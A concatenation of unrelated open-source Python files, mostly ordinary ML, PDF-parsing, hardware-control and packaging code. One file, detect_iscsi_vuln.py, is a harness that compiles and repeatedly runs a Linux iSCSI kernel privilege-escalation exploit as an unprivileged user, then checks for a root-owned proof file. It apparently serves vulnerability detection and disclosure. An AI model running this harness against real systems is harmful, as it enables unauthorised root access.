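#       def train(self): ...          # run one search/training pass
#       def validate(self): ...       # evaluate the current architecture
#       def export(self, file): ...   # dump the chosen architecture to `file`
#       def checkpoint(self): ...     # persist trainer state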
|
catalyst/core/runner.py | tadejsv/catalyst | 206 | 12718365 | from typing import Any, Dict, Mapping, Optional
from abc import ABC, abstractmethod
from collections import defaultdict, OrderedDict
import torch
from torch.utils.data import DataLoader, DistributedSampler
from catalyst.core.callback import Callback, ICallback
from catalyst.core.engine import Engine
from catalyst.core.logger import ILogger
from catalyst.core.misc import (
check_callbacks,
get_loader_batch_size,
get_loader_num_samples,
is_str_intersections,
sort_callbacks_by_order,
)
from catalyst.typing import (
RunnerCriterion,
RunnerModel,
RunnerOptimizer,
RunnerScheduler,
)
from catalyst.utils.misc import maybe_recursive_call, set_global_seed
BATCH_METRICS = Dict[str, float] # {"loss": 1.7}
LOADER_METRICS = Dict[str, float] # {"loss": 1.7}
# {"train": {"loss": 1.7}, "valid": {"loss": 1.7}}
EPOCH_METRICS = Dict[str, LOADER_METRICS]
# {0: {"train": {}, "valid": {}}, 1: {...}}
EXPERIMENT_METRICS = Dict[int, EPOCH_METRICS]
class IRunnerError(Exception):
"""Exception class for all runner errors."""
pass
class IRunner(ICallback, ILogger, ABC):
"""
An abstraction that contains all the logic of how to run the experiment,
epochs, loaders and batches.
Please check examples.
Args:
model: Torch model object
engine: Engine instance
Abstraction, please check out implementations for more details:
- :py:mod:`catalyst.runners.runner.Runner`
- :py:mod:`catalyst.runners.config.ConfigRunner`
.. note::
To learn more about Catalyst Core concepts, please check out
- :py:mod:`catalyst.core.runner.IRunner`
- :py:mod:`catalyst.core.engine.Engine`
- :py:mod:`catalyst.core.callback.Callback`
.. note::
Please follow the `minimal examples`_ sections for use cases.
.. _`minimal examples`: https://github.com/catalyst-team/catalyst#minimal-examples # noqa: E501, W505
"""
def __init__(self, model: RunnerModel = None, engine: Engine = None):
"""Init."""
self.engine: Engine = engine
self.loggers: Dict[str, ILogger] = {}
self.loaders: Dict[str, DataLoader] = None
self.model: RunnerModel = model
self.criterion: RunnerCriterion = None
self.optimizer: RunnerOptimizer = None
self.scheduler: RunnerScheduler = None
self.callbacks: Dict[str, Callback] = {}
# the dataflow - model input/output and other batch tensors
self.batch: Dict[str, torch.Tensor] = None
# metrics flow - batch, loader and epoch metrics
self.batch_metrics: BATCH_METRICS = defaultdict(None)
self.loader_metrics: LOADER_METRICS = defaultdict(None)
self.epoch_metrics: EPOCH_METRICS = defaultdict(None)
self.experiment_metrics: EXPERIMENT_METRICS = defaultdict(None)
# experiment info
self.epoch_step: int = 0
self.batch_step: int = 0
self.sample_step: int = 0
# loader info
self.loader: DataLoader = None
self.loader_key: str = None
self.is_train_loader: bool = False
self.is_valid_loader: bool = False
self.is_infer_loader: bool = True
self.loader_batch_size: int = 0
self.loader_batch_len: int = 0
self.loader_sample_len: int = 0
self.loader_batch_step: int = 0
self.loader_sample_step: int = 0
# batch info
self.batch_size: int = 0
# extra
self.exception: Exception = None
self.need_early_stop: bool = False
self._local_rank: int = -1
self._world_size: int = -1
@property
def seed(self) -> int:
"""Experiment's seed for reproducibility."""
return 42
@property
def hparams(self) -> OrderedDict:
"""
Returns hyper-parameters for current run.
Example::
>>> runner.hparams
OrderedDict([('optimizer', 'Adam'),
('lr', 0.02),
('betas', (0.9, 0.999)),
('eps', 1e-08),
('weight_decay', 0),
('amsgrad', False),
('train_batch_size', 32)])
Returns:
dictionary with hyperparameters
"""
return {}
@property
def num_epochs(self) -> int:
"""Returns the number of epochs in the experiment."""
return 1
def log_artifact(self, *args, **kwargs) -> None:
"""Logs artifact (file like audio, video, csv, etc.) to available loggers."""
for logger in self.loggers.values():
logger.log_artifact(*args, **kwargs, runner=self)
def log_image(self, *args, **kwargs) -> None:
"""Logs image to available loggers."""
for logger in self.loggers.values():
logger.log_image(*args, **kwargs, runner=self)
def log_hparams(self, *args, **kwargs) -> None:
"""Logs hyperparameters to available loggers."""
for logger in self.loggers.values():
logger.log_hparams(*args, **kwargs, runner=self)
def log_metrics(self, *args, **kwargs) -> None:
"""Logs batch, loader and epoch metrics to available loggers."""
for logger in self.loggers.values():
logger.log_metrics(*args, **kwargs, runner=self)
def flush_log(self) -> None:
"""Flushes the loggers."""
for logger in self.loggers.values():
logger.flush_log()
def close_log(self) -> None:
"""Closes the loggers."""
for logger in self.loggers.values():
logger.close_log()
@abstractmethod
def get_engine(self) -> Engine:
"""Returns the engine for the experiment."""
pass
def get_loggers(self) -> Dict[str, ILogger]:
"""Returns the loggers for the experiment."""
return {}
@abstractmethod
def get_loaders(self) -> "OrderedDict[str, DataLoader]":
"""Returns the loaders for the experiment."""
pass
@abstractmethod
def get_model(self) -> RunnerModel:
"""Returns the model for the experiment."""
pass
def get_criterion(self) -> Optional[RunnerCriterion]:
"""Returns the criterion for the experiment."""
return None
def get_optimizer(self, model: RunnerModel) -> Optional[RunnerOptimizer]:
"""Returns the optimizer for the experiment."""
return None
def get_scheduler(self, optimizer: RunnerOptimizer) -> Optional[RunnerScheduler]:
"""Returns the scheduler for the experiment."""
return None
def get_callbacks(self) -> "OrderedDict[str, Callback]":
"""Returns the callbacks for the experiment."""
return {}
def _setup_loaders(self) -> None:
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
loaders = self.get_loaders()
self.loaders = {
key: self.engine.prepare(value) for key, value in loaders.items()
}
def _setup_model(self) -> RunnerModel:
self.model = self.get_model()
return self.model
def _setup_criterion(self) -> RunnerCriterion:
self.criterion = self.get_criterion()
return self.criterion
def _setup_optimizer(self, model: RunnerModel = None) -> RunnerOptimizer:
if model is not None:
self.model = model
self.optimizer = self.get_optimizer(model=self.model)
return self.optimizer
def _setup_scheduler(self, optimizer: RunnerOptimizer = None) -> RunnerScheduler:
if optimizer is not None:
self.optimizer = optimizer
self.scheduler = self.get_scheduler(optimizer=self.optimizer)
return self.scheduler
def _setup_components(self) -> None:
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
self.model = self._setup_model()
self.criterion = self._setup_criterion()
self.optimizer = self._setup_optimizer(model=self.model)
self.scheduler = self._setup_scheduler(optimizer=self.optimizer)
if isinstance(self.model, torch.nn.Module):
self.model = self.engine.prepare(self.model)
elif isinstance(self.model, dict):
self.model = {k: self.engine.prepare(v) for k, v in self.model.items()}
else:
raise NotImplementedError()
if isinstance(self.optimizer, torch.optim.Optimizer):
self.optimizer = self.engine.prepare(self.optimizer)
elif isinstance(self.optimizer, dict):
self.optimizer = {
k: self.engine.prepare(v) for k, v in self.optimizer.items()
}
elif self.optimizer is None:
pass
else:
raise NotImplementedError()
def _setup_callbacks(self):
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
self.callbacks = sort_callbacks_by_order(self.get_callbacks())
check_callbacks(self.callbacks, self.criterion, self.optimizer, self.scheduler)
def on_experiment_start(self, runner: "IRunner"):
"""Event handler."""
self.epoch_step: int = 0
self.batch_step: int = 0
self.sample_step: int = 0
self.exception: Exception = None
self.need_early_stop: bool = False
# self.engine = self.get_engine()
self.engine.setup(local_rank=self._local_rank, world_size=self._world_size)
if self.engine.is_main_process:
self.loggers = self.get_loggers()
self.log_hparams(hparams=self.hparams)
with self.engine.local_main_process_first():
self._setup_loaders()
self._setup_components()
self._setup_callbacks()
def on_epoch_start(self, runner: "IRunner"):
"""Event handler."""
self.epoch_step += 1
self.epoch_metrics: Dict = defaultdict(None)
# storage for pure epoch-based metrics, like lr/momentum
self.epoch_metrics["_epoch_"] = {}
assert self.loaders is not None
for loader_key, loader in self.loaders.items():
if len(loader) == 0:
raise IRunnerError(f"DataLoader with name {loader_key} is empty.")
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
def on_loader_start(self, runner: "IRunner"):
"""Event handler."""
assert self.loader is not None
self.is_train_loader: bool = self.loader_key.startswith("train")
self.is_valid_loader: bool = self.loader_key.startswith("valid")
self.is_infer_loader: bool = self.loader_key.startswith("infer")
assert self.is_train_loader or self.is_valid_loader or self.is_infer_loader
self.loader_batch_size: int = get_loader_batch_size(self.loader)
self.loader_batch_len: int = len(self.loader)
self.loader_sample_len: int = get_loader_num_samples(self.loader)
self.loader_batch_step: int = 0
self.loader_sample_step: int = 0
self.loader_metrics: Dict = defaultdict(None)
if self.loader_batch_len == 0:
raise IRunnerError(f"DataLoader with name {self.loader_key} is empty.")
set_global_seed(self.seed + max(0, self.engine.process_index) + self.epoch_step)
maybe_recursive_call(self.model, "train", mode=self.is_train_loader)
if isinstance(self.loader.sampler, DistributedSampler):
self.loader.sampler.set_epoch(self.epoch_step)
def on_batch_start(self, runner: "IRunner"):
"""Event handler."""
if isinstance(self.batch, dict):
self.batch_size = len(next(iter(self.batch.values())))
else:
self.batch_size = len(self.batch[0])
# we have an batch per each worker...
self.batch_step += self.engine.num_processes
self.loader_batch_step += self.engine.num_processes
self.sample_step += self.batch_size * self.engine.num_processes
self.loader_sample_step += self.batch_size * self.engine.num_processes
self.batch_metrics: Dict = defaultdict(None)
def on_batch_end(self, runner: "IRunner"):
"""Event handler."""
# batch-metrics sync under ddp setup is too computation heavy
# if self.engine.distributed_type == DistributedType.NO: # @TODO: recheck
self.log_metrics(metrics=self.batch_metrics, scope="batch")
def on_loader_end(self, runner: "IRunner"):
"""Event handler."""
self.log_metrics(metrics=self.loader_metrics, scope="loader")
self.epoch_metrics[self.loader_key] = {
key: float(value) for key, value in self.loader_metrics.items()
}
def on_epoch_end(self, runner: "IRunner"):
"""Event handler."""
self.log_metrics(metrics=self.epoch_metrics, scope="epoch")
self.experiment_metrics[self.epoch_step] = self.epoch_metrics.copy()
self.flush_log()
def on_experiment_end(self, runner: "IRunner"):
"""Event handler."""
self.flush_log()
self.close_log()
self.engine.cleanup()
def on_exception(self, runner: "IRunner"):
"""Event handler."""
raise self.exception
def _run_event(self, event: str) -> None:
if is_str_intersections(event, ("_start",)):
getattr(self, event)(self)
for callback in self.callbacks.values():
getattr(callback, event)(self)
if is_str_intersections(event, ("_end", "_exception")):
getattr(self, event)(self)
@abstractmethod
def handle_batch(self, batch: Mapping[str, Any]) -> None:
"""
Inner method to handle specified data batch.
Used to make a train/valid/infer step during Experiment run.
Args:
batch (Mapping[str, Any]): dictionary with data batches from DataLoader.
"""
pass
def _run_loader(self) -> None:
with torch.set_grad_enabled(self.is_train_loader):
for self.batch in self.loader:
if self.need_early_stop:
self.need_early_stop = False
break
self._run_event("on_batch_start")
self.handle_batch(batch=self.batch)
self._run_event("on_batch_end")
def _run_epoch(self) -> None:
for self.loader_key, self.loader in self.loaders.items():
self._run_event("on_loader_start")
self._run_loader()
self._run_event("on_loader_end")
def _run_experiment(self) -> None:
while self.epoch_step < self.num_epochs:
if self.need_early_stop:
break
self._run_event("on_epoch_start")
self._run_epoch()
self._run_event("on_epoch_end")
def _run_local(self, local_rank: int = -1, world_size: int = 1) -> None:
self._local_rank, self._world_size = local_rank, world_size
self._run_event("on_experiment_start")
self._run_experiment()
self._run_event("on_experiment_end")
def _run(self) -> None:
self.engine = self.get_engine()
self.engine.spawn(self._run_local)
def run(self) -> "IRunner":
"""Runs the experiment.
Returns:
self, `IRunner` instance after the experiment
"""
try:
self._run()
except (Exception, KeyboardInterrupt) as ex:
self.exception = ex
self._run_event("on_exception")
return self
__all__ = ["IRunner", "IRunnerError"]
|
src/GridCal/update.py | mzy2240/GridCal | 284 | 12718367 | import subprocess
import sys
import pkg_resources
from GridCal.__version__ import __GridCal_VERSION__
def find_latest_version(name='GridCal'):
"""
Find the latest version of a package
:param name: name of the Package
:return: version string
"""
latest_version = str(subprocess.run([sys.executable, '-m', 'pip', 'install', '{}==random'.format(name)],
capture_output=True, text=True))
latest_version = latest_version[latest_version.find('(from versions:') + 15:]
latest_version = latest_version[:latest_version.find(')')]
latest_version = latest_version.replace(' ', '').split(',')[-1]
return latest_version
def check_version():
"""
Check package version
:return: version status code, pipy version string
version status code:
-2: failure
-1: this is a newer version
0: we are ok
+1: we are behind pipy, we can update
"""
latest_version = find_latest_version()
pipy_version = pkg_resources.parse_version(latest_version)
gc_version = pkg_resources.parse_version(__GridCal_VERSION__)
if pipy_version is None:
# could not connect
return -2, '0.0.0'
else:
if hasattr(pipy_version, 'release'):
if pipy_version.release is None:
# could not connect
return -2, '0.0.0'
if pipy_version == gc_version:
# same version, we're up to date
return 0, latest_version
elif pipy_version > gc_version:
# we have an older version, we may update
return 1, latest_version
elif pipy_version < gc_version:
# this version is newer than PiPy's
return -1, latest_version
else:
return 0, latest_version
def get_upgrade_command(latest_version=None):
"""
Get GridCal update command
:return:
"""
if latest_version is None:
latest_version = find_latest_version()
cmd = [sys.executable, '-m', 'pip', 'install',
'GridCal=={}'.format(latest_version),
'--upgrade',
'--no-dependencies']
return cmd
if __name__ == '__main__':
is_latest, curr_ver = check_version()
print('is the latest', is_latest, curr_ver)
|
tests/utils.py | d-hoke/py-pdf-parser | 186 | 12718404 | import re
from typing import NamedTuple, Callable, Dict, List, Optional, Union
from py_pdf_parser.components import PDFElement, PDFDocument, ElementOrdering
from py_pdf_parser.sectioning import Section
from pdfminer.layout import LTComponent
from py_pdf_parser.common import BoundingBox
from py_pdf_parser.loaders import Page
class FakePDFMinerCharacter(NamedTuple):
fontname: str = "fake_fontname"
height: float = 10
class FakePDFMinerIterator:
def __init__(self, font_name: str = "fake_font", font_size: float = 10):
self.finished = False
self.font_name = font_name
self.font_size = font_size
def __next__(self):
if self.finished:
raise StopIteration()
self.finished = True
return [FakePDFMinerCharacter(fontname=self.font_name, height=self.font_size)]
class FakePDFMinerTextElement(LTComponent):
"""
This is a stub to help create something which looks like a PDFMiner text element
for use in testing.
The fontname and size are detected by getting the first character of the first row
of the contained text. This is done by iterating, hence we define an iterator which
simply returns one list of length one and then raises StopIteration. This is the
minimum needed to pretend to allow extraction of the first character, for which
we use the FakeCharacter namedtuple which has fontname and height attibutes set.
"""
def __init__(
self,
bounding_box: "BoundingBox" = BoundingBox(0, 1, 0, 1),
text: str = "fake_text",
font_name: str = "fake_font",
font_size: float = 10,
):
super().__init__(
bbox=[bounding_box.x0, bounding_box.y0, bounding_box.x1, bounding_box.y1]
)
self.text = text
self.font_name = font_name
self.font_size = font_size
def __iter__(self):
return FakePDFMinerIterator(font_name=self.font_name, font_size=self.font_size)
def get_text(self) -> str:
if self.text is None:
return ""
return self.text
def create_pdf_element(
bounding_box: "BoundingBox" = BoundingBox(0, 1, 0, 1),
text: str = "fake_text",
font_name: str = "fake_font",
font_size: float = 10,
font_mapping: Optional[Dict[str, str]] = None,
font_mapping_is_regex: bool = False,
regex_flags: Union[int, re.RegexFlag] = 0,
font_size_precision: int = 1,
) -> "PDFElement":
document = create_pdf_document(
elements=[
FakePDFMinerTextElement(
bounding_box, text=text, font_name=font_name, font_size=font_size
)
],
font_mapping=font_mapping,
font_mapping_is_regex=font_mapping_is_regex,
regex_flags=regex_flags,
font_size_precision=font_size_precision,
)
return document.elements[0]
def create_pdf_document(
elements: Union[List[LTComponent], Dict[int, List[LTComponent]]],
font_mapping: Optional[Dict[str, str]] = None,
font_mapping_is_regex: bool = False,
regex_flags: Union[int, re.RegexFlag] = 0,
font_size_precision: int = 1,
element_ordering: Union[
ElementOrdering, Callable[[List], List]
] = ElementOrdering.LEFT_TO_RIGHT_TOP_TO_BOTTOM,
) -> "PDFDocument":
"""
Creates a PDF document with the given elements.
"elements" can be a list of elements (in which case a document with a single page
will be created) or a dictionary mapping page number to its list of elements.
"""
if not isinstance(elements, dict):
pages = {1: Page(elements=elements, width=100, height=100)}
else:
pages = {
page_number: Page(elements=elements_list, width=100, height=100)
for page_number, elements_list in elements.items()
}
return PDFDocument(
pages=pages,
font_mapping=font_mapping,
font_mapping_is_regex=font_mapping_is_regex,
regex_flags=regex_flags,
font_size_precision=font_size_precision,
element_ordering=element_ordering,
)
def create_section(
document: "PDFDocument",
name: str = "fake_name",
unique_name: str = "fake_name_1",
start_element: Optional["PDFElement"] = None,
end_element: Optional["PDFElement"] = None,
) -> "Section":
"""
Creates a simple section
"""
if start_element is None:
start_element = document._element_list[0]
if end_element is None:
end_element = document._element_list[-1]
return Section(document, name, unique_name, start_element, end_element)
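if __name__ == "__main__":
    # Ad-hoc sanity check (assumes py_pdf_parser is installed; not part of the
    # test suite): build a one-page fake document from two stub elements and
    # wrap the whole thing in a section.
    doc = create_pdf_document(
        elements=[
            FakePDFMinerTextElement(BoundingBox(0, 5, 6, 10), text="title"),
            FakePDFMinerTextElement(BoundingBox(0, 5, 0, 5), text="body"),
        ]
    )
    section = create_section(doc, name="demo", unique_name="demo_0")
    print(doc.elements[0], section)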
|
psdaq/psdaq/pyxpm/surf/devices/intel/_EM22xx.py | ZhenghengLi/lcls2 | 134 | 12718412 | <gh_stars>100-1000
#-----------------------------------------------------------------------------
# This file is part of the 'SLAC Firmware Standard Library'. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the 'SLAC Firmware Standard Library', including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
import surf.protocols.i2c
class EM22xx(surf.protocols.i2c.PMBus):
def __init__(self, **kwargs):
super().__init__(**kwargs)
literalDataFormat = surf.protocols.i2c.getPMbusLiteralDataFormat
linearDataFormat = surf.protocols.i2c.getPMbusLinearDataFormat
self.add(pr.LinkVariable(
name = 'VIN',
mode = 'RO',
units = 'V',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_VIN],
))
self.add(pr.LinkVariable(
name = 'VOUT',
mode = 'RO',
units = 'V',
disp = '{:1.3f}',
linkedGet = linearDataFormat,
dependencies = [self.VOUT_MODE,self.READ_VOUT],
))
self.VOUT_MODE._default = 0x13
self.add(pr.LinkVariable(
name = 'IOUT',
mode = 'RO',
units = 'A',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_IOUT],
))
self.add(pr.LinkVariable(
name = 'TEMPERATURE[1]',
mode = 'RO',
units = 'degC',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_TEMPERATURE_1],
))
self.add(pr.LinkVariable(
name = 'TEMPERATURE[2]',
mode = 'RO',
units = 'degC',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_TEMPERATURE_2],
))
self.add(pr.LinkVariable(
name = 'DUTY_CYCLE',
mode = 'RO',
units = '%',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_DUTY_CYCLE],
))
self.add(pr.LinkVariable(
name = 'FREQUENCY',
mode = 'RO',
units = 'kHz',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_FREQUENCY],
))
self.add(pr.LinkVariable(
name = 'POUT',
mode = 'RO',
units = 'W',
disp = '{:1.3f}',
linkedGet = literalDataFormat,
dependencies = [self.READ_POUT],
))
|
backpack/extensions/curvmatprod/ggnmp/pooling.py | jabader97/backpack | 395 | 12718449 | <reponame>jabader97/backpack
from backpack.core.derivatives.avgpool2d import AvgPool2DDerivatives
from backpack.core.derivatives.maxpool2d import MaxPool2DDerivatives
from backpack.extensions.curvmatprod.ggnmp.ggnmpbase import GGNMPBase
class GGNMPAvgPool2d(GGNMPBase):
def __init__(self):
super().__init__(derivatives=AvgPool2DDerivatives())
class GGNMPMaxpool2d(GGNMPBase):
def __init__(self):
super().__init__(derivatives=MaxPool2DDerivatives())
|
2021.03.12-linux-iscsi/detect_iscsi_vuln.py | jeffball55/NotQuite0DayFriday | 756 | 12718471 | <reponame>jeffball55/NotQuite0DayFriday
#!/usr/bin/env python
# I
# ,I~
# II7 __ __ _____ _ _
# ,: :I+7~ : \ \ / / / ____| (_) | |
# ~~ 77+?7 ,== \ \ / / ___ _ __ | (___ _ __ _ __ _ | |_ ___
# ===, =II+ 7+ :~==, \ \/ / / _ \ | '__| \___ \ | '_ \ | '__| | | | __| / _ \
# =+, ,=III77777= ~~~ \ / | __/ | | ____) | | |_) | | | | | | |_ | __/
# , ?IIII77777777: : \/ \___| |_| |_____/ | .__/ |_| |_| \__| \___|
# IIIIII77777777$~ | |
# ~?II~ ?7I ,77$7= |_|
# :=???+IIIII 7 77$$$$$$$I:
# :++??+~::IIIII= :I77$$7IIII$$Z7=
# ~??????IIIII7, 7777$$::I7$Z7=
# ,+I?IIIII7 77777$$$7+:
# ?IIIII7 I77777$,
# =IIIIII777777 ______ _ _ _____ _ _
# ~=: ,I777777I, ~= | ____| | | | | / ____| (_) | |
# ~===, :I,+77~ ~~== | |__ __ __ ___ | | __ __ ___ __| | | (___ ___ ___ _ _ _ __ _ | |_ _ _
# :=~ I7+77 :==, | __| \ \ / / / _ \ | | \ \ / / / _ \ / _` | \___ \ / _ \ / __| | | | | | '__| | | | __| | | | |
# ,: ,7I7: ,~, | |____ \ V / | (_) | | | \ V / | __/ | (_| | ____) | | __/ | (__ | |_| | | | | | | |_ | |_| |
# I7I |______| \_/ \___/ |_| \_/ \___| \__,_| |_____/ \___| \___| \__,_| |_| |_| \__| \__, |
# 7, __/ |
# = |___/
#
# Detect script by @meecles
#
from pathlib import Path
from shutil import copyfile
import subprocess
import os
import sys
sub_uname = subprocess.run(['uname', '-r'], stdout=subprocess.PIPE)
version = sub_uname.stdout.decode("utf-8").rstrip()
elversion = version.split(".")[len(version.split(".")) - 2]
depriv_user = None
sysmap = "/boot/System.map-{}".format(version)
exploit_setup = False
def is_root():
return os.geteuid() == 0
def get_addr(item):
sub = subprocess.run(["grep", item, sysmap], stdout=subprocess.PIPE)
return sub.stdout.decode("utf-8").rstrip()
def recompile():
os.system("cp symbols.c symbols.c.bak")
os.system("rm symbols.c")
sub = subprocess.run(["sh", "utilities/build_symbols.sh"], stdout=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
arr = res.split("//###")
syms = arr[0]
inject = arr[1]
new_lines = []
template = open("symbols.template.c", "r")
lines = template.readlines()
for line in lines:
if "##ARR_SYMBOLS##" in line:
new_lines.append(syms + "\n")
elif "##ARR_ADD##" in line:
new_lines.append(inject + "\n")
else:
new_lines.append(line)
symbols = open("symbols.c", "w")
symbols.writelines(new_lines)
symbols.close()
return True
def setup_exploit(add_symbols=False):
global exploit_setup
files = ["a.sh", "exploit.c", "Makefile"] # Check if some of the files exist
for file in files:
p = Path("./{}".format(file))
if not p.is_file():
return False
if add_symbols:
recompile()
copyfile("a.sh", "/tmp/a.sh")
os.system("chmod +x /tmp/a.sh")
os.system("make")
exploit_setup = True
return True
def run_exploit():
# We're root, so run as a deprivileged user
sub = subprocess.run(["su", "-c", "./exploit", depriv_user], stdout=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
return res
def check(vers="Unknown Version"):
global symbol_mem
global symbol_touser
print("{} detected, checking for symbols".format(vers))
if vers != "CentOS 8" or vers.startswith("CentOS 8"):
print("Recompiling to add symbol offsets")
setup_exploit(add_symbols=True)
print("Built, continuing")
    required_symbols = [
        r"\<seq_buf_putmem\>", r"\<seq_buf_to_user\>", "module_kset", "param_array_free", r"\<memcpy\>", r"\<modules\>",
        "run_cmd", r"\<netlink_sock_destruct$"
    ]
for symbol in required_symbols:
sym = get_addr(symbol)
if len(sym) < 1:
print("Failed to read symbols")
return False
print("Found all the symbols")
success = False
res = None
for i in range(0, 20 if "-fast" not in sys.argv else 3):
res = run_exploit()
if res.endswith("Success"):
success = True
break
if success:
print("Exploit ran!")
return True
if res is not None and res.endswith("Failed to detect kernel slide"):
print("Exploit failed, but is likely to succeed if you reboot. Most likely vulnerable.")
return False
print("Failed to run exploit but found symbols, possibly vulnerable but current exploit not possible")
return False
def verify_success():
sub = subprocess.run(["ls", "-l", "/tmp/proof"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
res = sub.stdout.decode("utf-8").rstrip()
er = sub.stderr.decode("utf-8").rstrip()
return res is not None and len(res) > 5 and "root" in res and depriv_user not in res
if __name__ == '__main__':
if not is_root():
print("Please run with sudo or as root")
quit()
if len(sys.argv) > 1:
depriv_user = sys.argv[1]
if depriv_user is None:
print("Please provide username of non-admin user\nUsage: python3 detect.py user")
quit()
if "-compile" in sys.argv:
recompile()
quit()
if elversion == "el8" or elversion.startswith("el8"):
num = "8"
if elversion != "el8" and "_" in elversion:
num = "8." + elversion.split("_")[1]
if check(vers="CentOS {}".format(num)):
verified = verify_success()
if verified:
print("Vulnerable!")
else:
print("Exploit ran, but was unable to verify that it worked")
else:
print("Not vulnerable!")
elif elversion == "el7":
if check(vers="CentOS 7"):
verified = verify_success()
if verified:
print("Vulnerable!")
else:
print("Exploit ran, but was unable to verify that it worked")
else:
print("Not vulnerable!")
else:
success = check()
if success:
print("Found memory symbols")
verify_success()
|
terrascript/provider/DTherHtun/idm.py | mjuenema/python-terrascript | 507 | 12718477 | # terrascript/provider/DTherHtun/idm.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:19:03 UTC)
import terrascript
class idm(terrascript.Provider):
"""Terrafrom Provider for Redhat IDM"""
__description__ = "Terrafrom Provider for Redhat IDM"
__namespace__ = "DTherHtun"
__name__ = "idm"
__source__ = "https://github.com/DTherHtun/terraform-provider-idm"
__version__ = "0.0.2"
__published__ = "2020-06-11T08:01:15Z"
__tier__ = "community"
__all__ = ["idm"]
|
app/extensions/default_view/__init__.py | Allen7D/mini-shop-server | 533 | 12718546 | # _*_ coding: utf-8 _*_
"""
Created by Allen7D on 2020/6/9.
"""
from importlib import import_module
from flask import current_app, render_template, redirect
from app.core.error import APIException
__author__ = 'Allen7D'
def apply_default_view(app):
'''
    :param app: Flask instance
:return:
'''
app.config.from_object('app.extensions.default_view.config')
@app.route('/')
def index():
        '''Redirect to the home page'''
url = {
'github': current_app.config['GITHUB_URL'],
'doc': current_app.config['DOC_URL'],
}
return render_template("index.html", url=url)
@app.route('/doc')
def doc():
        '''Redirect to the API docs'''
return redirect('/apidocs/#/')
apply_error_code_view(app)
def apply_error_code_view(app):
def load_exception():
module = import_module('app.libs.error_code')
exception_list = []
for elem_name in dir(module):
elem = getattr(module, elem_name)
if type(elem) == type and issubclass(elem, APIException):
exception_list.append(elem())
exception_list.sort(key=lambda x: x.error_code)
return exception_list
exception_list = load_exception()
@app.route('/error_code')
def error_code():
return render_template('error_code.html', exception_list=exception_list)
|
icevision/models/ross/efficientdet/prediction.py | ai-fast-track/mantisshrimp | 580 | 12718557 | __all__ = ["predict", "predict_from_dl", "convert_raw_predictions", "end2end_detect"]
from icevision.imports import *
from icevision.utils import *
from icevision.core import *
from icevision.data import *
from icevision.models.utils import _predict_from_dl
from icevision.models.ross.efficientdet.dataloaders import *
from effdet import DetBenchTrain, DetBenchPredict, unwrap_bench
from icevision.models.inference import *
@torch.no_grad()
def _predict_batch(
model: Union[DetBenchTrain, DetBenchPredict],
batch: Sequence[torch.Tensor],
records: Sequence[BaseRecord],
detection_threshold: float = 0.5,
keep_images: bool = False,
device: Optional[torch.device] = None,
) -> List[Prediction]:
device = device or model_device(model)
imgs, img_info = batch
imgs = imgs.to(device)
img_info = {k: v.to(device) for k, v in img_info.items()}
bench = DetBenchPredict(unwrap_bench(model))
bench = bench.eval().to(device)
raw_preds = bench(x=imgs, img_info=img_info)
preds = convert_raw_predictions(
batch=batch,
raw_preds=raw_preds,
records=records,
detection_threshold=detection_threshold,
keep_images=keep_images,
)
return preds
def predict(
model: Union[DetBenchTrain, DetBenchPredict],
dataset: Dataset,
detection_threshold: float = 0.5,
keep_images: bool = False,
device: Optional[torch.device] = None,
) -> List[Prediction]:
batch, records = build_infer_batch(dataset)
return _predict_batch(
model=model,
batch=batch,
records=records,
detection_threshold=detection_threshold,
keep_images=keep_images,
device=device,
)
def predict_from_dl(
model: nn.Module,
infer_dl: DataLoader,
show_pbar: bool = True,
keep_images: bool = False,
**predict_kwargs,
):
return _predict_from_dl(
predict_fn=_predict_batch,
model=model,
infer_dl=infer_dl,
show_pbar=show_pbar,
keep_images=keep_images,
**predict_kwargs,
)
def convert_raw_predictions(
batch,
raw_preds: torch.Tensor,
records: Sequence[BaseRecord],
detection_threshold: float,
keep_images: bool = False,
) -> List[Prediction]:
tensor_images, *_ = batch
dets = raw_preds.detach().cpu().numpy()
preds = []
for det, record, tensor_image in zip(dets, records, tensor_images):
if detection_threshold > 0:
scores = det[:, 4]
keep = scores > detection_threshold
det = det[keep]
pred = BaseRecord(
(
ScoresRecordComponent(),
ImageRecordComponent(),
InstancesLabelsRecordComponent(),
BBoxesRecordComponent(),
)
)
pred.detection.set_class_map(record.detection.class_map)
pred.detection.set_labels_by_id(det[:, 5].astype(int))
pred.detection.set_bboxes([BBox.from_xyxy(*xyxy) for xyxy in det[:, :4]])
pred.detection.set_scores(det[:, 4])
if keep_images:
record.set_img(tensor_to_image(tensor_image))
preds.append(Prediction(pred=pred, ground_truth=record))
return preds
end2end_detect = partial(_end2end_detect, predict_fn=predict)
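# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch only, not part of the original module.
# Typical use of the `predict` function defined above; `model` is assumed to
# be an effdet DetBenchTrain/DetBenchPredict and `valid_ds` an icevision
# Dataset created elsewhere.
def _example_predict(model, valid_ds):
    preds = predict(model=model, dataset=valid_ds, detection_threshold=0.5)
    # Each Prediction wraps a record whose detection component carries the
    # scores, labels and bboxes filled in by convert_raw_predictions above.
    return [p.pred.detection.scores for p in preds]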
|
gunicorn/tests/test_metadata.py | vbarbaresi/integrations-core | 663 | 12718572 | # (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import pytest
from datadog_checks.gunicorn import GUnicornCheck
